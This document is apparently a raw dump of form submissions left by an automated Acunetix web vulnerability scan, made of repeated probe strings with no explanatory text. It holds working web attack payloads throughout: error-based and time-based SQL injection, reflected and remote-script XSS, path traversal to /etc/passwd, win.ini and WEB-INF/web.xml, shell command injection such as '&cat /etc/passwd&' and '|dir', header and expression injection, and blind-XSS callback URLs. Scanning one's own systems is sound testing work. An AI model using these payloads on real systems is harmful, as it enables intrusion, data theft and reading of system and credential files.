'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(80),CHAR(116),CHAR(119),CHAR(87),CHAR(53),CHAR(57),CHAR(72),CHAR(65)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

../../../../../../../../../../boot.ini

1

1

1

1

response.write(9114915*9891343)

1'"()&%<ScRiPt >prompt(911112)</ScRiPt>

[url=http://www.acunetix.com]website security[/url]

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(80)+CHAR(116)+CHAR(119)+CHAR(87)+CHAR(53)+CHAR(57)+CHAR(72)+CHAR(65)) FROM syscolumns)+'

1

1

1

../../../../../../../../../../windows/win.ini.jpg

'+response.write(9114915*9891343)+'

1_IMumm <ScRiPt >prompt(992268)</ScRiPt>

'"()&%<ScRiPt >prompt(927196)</ScRiPt>

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(80)+CHAR(116)+CHAR(119)+CHAR(87)+CHAR(53)+CHAR(57)+CHAR(72)+CHAR(65))+'

"+response.write(9114915*9891343)+"

1

1

&cat /etc/passwd&

1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(111),CHAR(101),CHAR(67),CHAR(102),CHAR(122),CHAR(121),CHAR(114)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

1_970286

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

1

1

1

1

................windowswin.ini

1

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(102),CHAR(111),CHAR(101),CHAR(67),CHAR(102),CHAR(122),CHAR(121),CHAR(114)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

"&cat /etc/passwd&"

1

1

1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(111)+CHAR(101)+CHAR(67)+CHAR(102)+CHAR(122)+CHAR(121)+CHAR(114)) FROM syscolumns)+"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(102)+CHAR(111)+CHAR(101)+CHAR(67)+CHAR(102)+CHAR(122)+CHAR(121)+CHAR(114))+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acu1569\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1569

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

'|'ld

acux10875\xc0\xbez1\xc0\xbcz2a\x90bcxuca10875

1

${100218+100248}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

-1

1

1

"|"ld

1<ScRiPt >prompt(907538)</ScRiPt>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n993317=v976400

1

1<script>prompt(948983)</script>

1

1

1some_inexistent_file_with_long_name%00.jpg

-1))

WEB-INF/web.xml

1

)

'

1<ScRiPt >prompt(929880)</ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF\web.xml

1

PbhfxFJU'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956726></ScRiPt>

1

"

1

testasp.vulnweb.com

^(#$!@#$)(()))******

aPKEuJ7s')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<ScRiPt >prompt(900111)</ScRiPt>

'"()

1

||cat /etc/passwd

1

1

w5NXXw0N'))

/etc/passwd

&dir

1

1

1

1<video><source onerror="javascript:prompt(970626)">

1

1

1

-1

1

'&dir&'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984346)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1)

1

1

1<div style=width:expression(prompt(998651))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"&dir&"

1

1

-1))

http://hitUurcLZVD5B.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<iframe src='data:text/html

'

acunetix_wvs_invalid_filename

1

09PzKbZ7'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

|dir

1

1

MFiAYv3Q')

1<body onload=prompt(983335)>

comments

"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'|dir

Qfo3Nu8F'))

1

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950347)>

1

comments

1

"|dir

1

file:///etc/passwd

http://www.acunetix.tst

comments/.

'"

1<img src=xyz OnErRor=prompt(949330)>

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

1'"()&%<ScRiPt >prompt(980910)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1<img/src=">" onerror=alert(954958)>

<!--

1

1

'"()&%<ScRiPt >prompt(985735)</ScRiPt>

1

1

1<ScRiPt%20>prompt(994086)</sCripT>

1

WEB-INF/web.xml

1

1

1

1_965930

1

1

1&lt

1

1

1

1

1

WEB-INF\web.xml

1

\xf6<img acu onmouseover=prompt(901033) //\xf6>

response.write(9618289*9594764)

1

1

1<input autofocus onfocus=prompt(941819)>

1

1

'+response.write(9618289*9594764)+'

../../../../../../../../../../windows/win.ini

1

<a href='http://www.acunetix.com'>website security</a>

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9618289*9594764)+"

1

1

../../../../../../../../../../boot.ini

1

'&cat /etc/passwd&'

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1_C0yiH <ScRiPt >prompt(979484)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

../../../../../../../../../../etc/passwd

1

acu5099\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5099

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

cat /etc/passwd

1

1

1

1

acux9676\xc0\xbez1\xc0\xbcz2a\x90bcxuca9676

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

................windowswin.ini

`cat /etc/passwd`

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<ScRiPt >prompt(990254)</ScRiPt>

../../../../../../../../../../etc/passwd.jpg

${100097+99859}

1

1

1

1<script>prompt(994001)</script>

1

1

|cat /etc/passwd#

..\..\..\..\..\..\..\..\windows\win.ini

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<ScRiPt >prompt(978566)</ScRiPt>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

1&n949035=v966692

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?924903></ScRiPt>

'|'ld

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

1

1<ScRiPt >prompt(990962)</ScRiPt>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

-1))

1

1

1<video><source onerror="javascript:prompt(925186)">

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905969)"></g></svg>

jXnMrIKZ'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(910274))>

'"()

1

^(#$!@#$)(()))******

/etc/passwd

rvPaMIyx')

'

1

1

1

1

1<iframe src='data:text/html

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

WEB-INF/web.xml

5lzmGjGf'))

1

1

1

1

1<body onload=prompt(945702)>

1

WEB-INF\web.xml

1

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999413)>

-1)

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

&dir

1

1<img src=xyz OnErRor=prompt(903949)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

"

http://hit66zn45SvoP.bxss.me/

acunetix_wvs_invalid_filename

NKloK99a'

'&dir&'

1<img/src=">" onerror=alert(925905)>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

WGmxuPUE')

1

comments

file:///etc/passwd

"&dir&"

${@print(md5(acunetix_wvs_security_test))}\

1'"

1<ScRiPt%20>prompt(941722)</sCripT>

1

dslEFSza'))

/\../\../\../\../\../\../\../etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1&lt

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(51),CHAR(77),CHAR(103),CHAR(79),CHAR(116),CHAR(78),CHAR(120),CHAR(107)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

|dir

comments/.

1

1

http://www.acunetix.tst

WEB-INF/web.xml

1

1

\xf6<img acu onmouseover=prompt(937303) //\xf6>

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(51),CHAR(77),CHAR(103),CHAR(79),CHAR(116),CHAR(78),CHAR(120),CHAR(107)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1

'"

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(51)+CHAR(77)+CHAR(103)+CHAR(79)+CHAR(116)+CHAR(78)+CHAR(120)+CHAR(107)) FROM syscolumns)

WEB-INF\web.xml

1<input autofocus onfocus=prompt(900443)>

1

'|dir

1

1

<!--

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(51)+CHAR(77)+CHAR(103)+CHAR(79)+CHAR(116)+CHAR(78)+CHAR(120)+CHAR(107))

1

"|dir

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../windows/win.ini

1

1

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(48),CHAR(90),CHAR(106),CHAR(97),CHAR(55),CHAR(119),CHAR(54),CHAR(83)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

../../../../../../../../../../boot.ini

1

1

1'"()&%<ScRiPt >prompt(922852)</ScRiPt>

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(48),CHAR(90),CHAR(106),CHAR(97),CHAR(55),CHAR(119),CHAR(54),CHAR(83)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

1

response.write(9098271*9228827)

[url=http://www.acunetix.com]website security[/url]

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(48)+CHAR(90)+CHAR(106)+CHAR(97)+CHAR(55)+CHAR(119)+CHAR(54)+CHAR(83)) FROM syscolumns)+'

../../../../../../../../../../windows/win.ini.jpg

1

'"()&%<ScRiPt >prompt(984273)</ScRiPt>

1

1

&cat /etc/passwd&

'+response.write(9098271*9228827)+'

1

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(48)+CHAR(90)+CHAR(106)+CHAR(97)+CHAR(55)+CHAR(119)+CHAR(54)+CHAR(83))+'

1_985714

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1_fJiib <ScRiPt >prompt(960292)</ScRiPt>

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(122),CHAR(111),CHAR(90),CHAR(82),CHAR(120),CHAR(89),CHAR(75),CHAR(113)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

"+response.write(9098271*9228827)+"

'&cat /etc/passwd&'

1

1

................windowswin.ini

1

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(122),CHAR(111),CHAR(90),CHAR(82),CHAR(120),CHAR(89),CHAR(75),CHAR(113)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

1

1

1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(122)+CHAR(111)+CHAR(90)+CHAR(82)+CHAR(120)+CHAR(89)+CHAR(75)+CHAR(113)) FROM syscolumns)+"

"&cat /etc/passwd&"

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(122)+CHAR(111)+CHAR(90)+CHAR(82)+CHAR(120)+CHAR(89)+CHAR(75)+CHAR(113))+"

1

cat /etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../../../../../../../../../../etc/passwd

1

acu9876\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9876

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

acux1423\xc0\xbez1\xc0\xbcz2a\x90bcxuca1423

|cat /etc/passwd#

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt >prompt(946484)</ScRiPt>

1

'|'ld

1

-1

1

1

"|"ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<script>prompt(987787)</script>

1

1

WEB-INF/web.xml

1

1

-1)

${99896+99276}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(919351)</ScRiPt>

1

WEB-INF\web.xml

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934254></ScRiPt>

-1))

'

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n909328=v987557

1

"

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt >prompt(927563)</ScRiPt>

1

1

1some_inexistent_file_with_long_name%00.jpg

auwT2iCP'

1

1

1<video><source onerror="javascript:prompt(971684)">

||cat /etc/passwd

1

)

/etc/passwd

1

1

SsiAUbmo')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936802)"></g></svg>

1

&dir

!(()&&!|*|*|

1

1

1<div style=width:expression(prompt(996361))>

testasp.vulnweb.com

1

qFTfI1er'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'&dir&'

^(#$!@#$)(()))******

1

1

1

1

-1

1<iframe src='data:text/html

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1<body onload=prompt(973867)>

1

-1)

"&dir&"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(956697)>

1

1

1

-1))

|dir

1

1<img src=xyz OnErRor=prompt(948545)>

1

HDO6v1JO'

1

1

'|dir

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<img/src=">" onerror=alert(931647)>

oSKd75Ym')

"|dir

1

1

'

file:///etc/passwd

acunetix_wvs_invalid_filename

Ox7go1Ff'))

1<ScRiPt%20>prompt(997097)</sCripT>

1

1

comments

1

1

"

1

comments

1

/\../\../\../\../\../\../\../etc/passwd

1&lt

1

http://hitUprowjHd1e.bxss.me/

1

1

1

${@print(md5(acunetix_wvs_security_test))}

comments/.

WEB-INF/web.xml

\xf6<img acu onmouseover=prompt(949400) //\xf6>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

WEB-INF\web.xml

1<input autofocus onfocus=prompt(995165)>

1

1

http://www.acunetix.tst

1

1

1

'"

1

../../../../../../../../../../windows/win.ini

<a href='http://www.acunetix.com'>website security</a>

1'"()&%<ScRiPt >prompt(973765)</ScRiPt>

1

1

<!--

1

1

../../../../../../../../../../boot.ini

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(902254)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1_T1TDs <ScRiPt >prompt(900381)</ScRiPt>

1

1

1

1

1

1_942338

1

1

1

1

response.write(9572859*9835476)

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

&cat /etc/passwd&

1

1

1

1

1

'+response.write(9572859*9835476)+'

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

................windowswin.ini

"+response.write(9572859*9835476)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

acu1670\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1670

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

${100200+100334}

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acux6633\xc0\xbez1\xc0\xbcz2a\x90bcxuca6633

|cat /etc/passwd#

1&n935086=v953005

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt >prompt(990490)</ScRiPt>

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

WEB-INF/web.xml

1some_inexistent_file_with_long_name%00.jpg

)

1

1<script>prompt(957573)</script>

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

1<ScRiPt >prompt(923217)</ScRiPt>

!(()&&!|*|*|

WEB-INF\web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

/etc/passwd

-1)

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?992501></ScRiPt>

1

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1

1<ScRiPt >prompt(995133)</ScRiPt>

-1))

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1<video><source onerror="javascript:prompt(931676)">

1

vPktWmqG'

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

"

htLwVfyA')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944160)"></g></svg>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

1

1

||cat /etc/passwd

1<div style=width:expression(prompt(974274))>

Jdry7SGK'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

http://hit1LhXdNfQQt.bxss.me/

&dir

-1

1<iframe src='data:text/html

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

'&dir&'

1<body onload=prompt(946008)>

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

comments

1

1

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

-1))

"&dir&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990788)>

comments/.

1

'"

WEB-INF/web.xml

wjThwBlB'

1'"()&%<ScRiPt >prompt(975589)</ScRiPt>

|dir

1<img src=xyz OnErRor=prompt(976188)>

1

WEB-INF\web.xml

1

mFzi41wh')

1

<!--

'"()&%<ScRiPt >prompt(901920)</ScRiPt>

1

'|dir

1<img/src=">" onerror=alert(935642)>

1

1

1_905009

1

JSoZxmuE'))

1

../../../../../../../../../../windows/win.ini

1

"|dir

1<ScRiPt%20>prompt(929467)</sCripT>

1

1

1

1

response.write(9382133*9062464)

1

../../../../../../../../../../boot.ini

1

1

1

1&lt

1

'+response.write(9382133*9062464)+'

acu2711\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2711

1

1

../../../../../../../../../../windows/win.ini.jpg

&cat /etc/passwd&

\xf6<img acu onmouseover=prompt(981175) //\xf6>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9382133*9062464)+"

1

acux2617\xc0\xbez1\xc0\xbcz2a\x90bcxuca2617

SomeCustomInjectedHeader:injected_by_wvs

1<input autofocus onfocus=prompt(908752)>

1

1

'&cat /etc/passwd&'

1<ScRiPt >prompt(946711)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

<a href='http://www.acunetix.com'>website security</a>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<script>prompt(901593)</script>

................windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

cat /etc/passwd

1

1

1<ScRiPt >prompt(953567)</ScRiPt>

1_lfaKU <ScRiPt >prompt(989159)</ScRiPt>

1

../../../../../../../../../../etc/passwd

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950322></ScRiPt>

`cat /etc/passwd`

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(990301)</ScRiPt>

1

../../../../../../../../../../etc/passwd.jpg

1

|cat /etc/passwd#

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(928921)">

if(now()=sysdate(),sleep(8.718),0)/*'XOR(if(now()=sysdate(),sleep(8.718),0))OR'"XOR(if(now()=sysdate(),sleep(8.718),0))OR"*/

'|'ld

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

(select(0)from(select(sleep(8.718)))v)/*'+(select(0)from(select(sleep(8.718)))v)+'"+(select(0)from(select(sleep(8.718)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991617)"></g></svg>

${100356+99756}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<div style=width:expression(prompt(931141))>

1

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1some_inexistent_file_with_long_name%00.jpg

-1)

1<iframe src='data:text/html

WEB-INF/web.xml

1&n956971=v965403

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

-1))

1

WEB-INF\web.xml

1

1<body onload=prompt(939997)>

testasp.vulnweb.com

"

aDbFWrbJ'

/etc/passwd

1

1

)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915097)>

1

1

8odu65cj')

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

!(()&&!|*|*|

||cat /etc/passwd

1

1

jLUI9MNV'))

1

1

1<img src=xyz OnErRor=prompt(920165)>

1

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()

^(#$!@#$)(()))******

1<img/src=">" onerror=alert(937567)>

1

1

-1

1

1<ScRiPt%20>prompt(977320)</sCripT>

1

'&dir&'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1)

1

1

1&lt

1

"&dir&"

1

1

\xf6<img acu onmouseover=prompt(970486) //\xf6>

1

1

-1))

file:///etc/passwd

1

|dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<input autofocus onfocus=prompt(980849)>

u8GEo1FP'

'

1

1

<a href='http://www.acunetix.com'>website security</a>

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

acunetix_wvs_invalid_filename

"

ZTPQS6Jn')

[url=http://www.acunetix.com]website security[/url]

1

"|dir

1

http://hitcQUF2DbUJt.bxss.me/

WEB-INF/web.xml

1_okbCy <ScRiPt >prompt(946969)</ScRiPt>

KkAW8ToT'))

${@print(md5(acunetix_wvs_security_test))}

1

comments

1

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

comments

1

WEB-INF\web.xml

1

'"

1

1

http://www.acunetix.tst

1

1

../../../../../../../../../../windows/win.ini

1

comments/.

<!--

1

